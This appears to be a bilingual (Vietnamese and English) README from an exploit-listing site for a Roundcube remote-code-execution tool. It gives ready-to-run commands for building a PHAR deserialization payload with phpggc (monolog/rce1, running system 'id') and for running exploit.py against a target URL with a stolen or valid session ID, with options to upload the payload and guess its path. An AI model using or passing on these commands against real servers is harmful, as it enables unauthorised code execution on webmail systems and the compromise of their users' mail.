Share
## https://sploitus.com/exploit?id=C14A8D2B-AD15-545B-90EF-7A092B8DFBF9
## VIETNAMESE ##

- ## ✅ Tính năng: ##

>Hỗ trợ upload payload.phar

>Tự động đoán path nếu không biết chính xác

>Cho phép sử dụng phar:// path tùy chọn

>Có tùy chọn --upload-payload, --auto-path, --direct-path

- ## 🧪 Cách dùng: ##
- 1. Tạo payload:

>phpggc monolog/rce1 system 'id' -p phar -o payload.phar

- 2. Upload và khai thác tự động:

>python3 exploit.py https://target.com  SESSIONID  --upload-payload payload.phar --auto-path

- 3. Upload và tự nhập path nếu biết chính xác đường dẫn :

>python3 exploit.py https://target.com  SESSIONID  --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar

- 4. Không upload, chỉ khai thác:

>python3 exploit.py https://target.com  SESSIONID  --direct-path /var/www/html/temp/payload.phar

>✅ Bạn có thể thay  SESSIONID  bằng session hợp lệ của Roundcube.
 
## ENGLISH ##
- ## ✅ Features: ##

>Support uploading payload.phar

>Automatically guess the path if not exactly known

>Allow the use of phar:// path option

>There are options --upload-payload, --auto-path, --direct-path

- ## 🧪 How to use: ##
- 1. Create payload:

>phpggc monolog/rce1 system 'id' -p phar -o payload.phar

- 2. Upload and exploit automatically:

>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --auto-path

- 3. Upload and enter the path yourself if you know the exact path:

>python3 exploit.py https://target.com SESSIONID --upload-payload payload.phar --direct-path /var/www/html/temp/payload.phar

- 4. Do not upload, just exploit:

>python3 exploit.py https://target.com SESSIONID --direct-path /var/www/html/temp/payload.phar

- ✅ You can replace SESSIONID with a valid Roundcube session.